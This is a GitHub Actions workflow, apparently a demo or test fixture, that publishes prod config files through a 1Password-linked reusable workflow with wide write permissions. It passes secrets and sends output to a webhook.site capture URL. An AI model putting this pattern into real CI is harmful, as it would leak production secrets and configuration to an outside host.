name: Publish Prod Config Updates
on:
    push:
        branches: 
            - main
        paths:
            - '**.prod.config.json'
jobs:
    publish-configs:
        permissions:
            contents: write
            pull-requests: write
            checks: write
            actions: read
            id-token: write
            packages: write
        uses: ./.github/workflows/publish-configs-1pass.yml
        secrets: 
            MY-SECRET: $SECRET
            SECRET1: $SECRET
        with:
            publish-url: 'https://webhook.site/c33c6f62-9347-46d2-8e88-218eeeee7464'
            vault-name: 'hello-world'

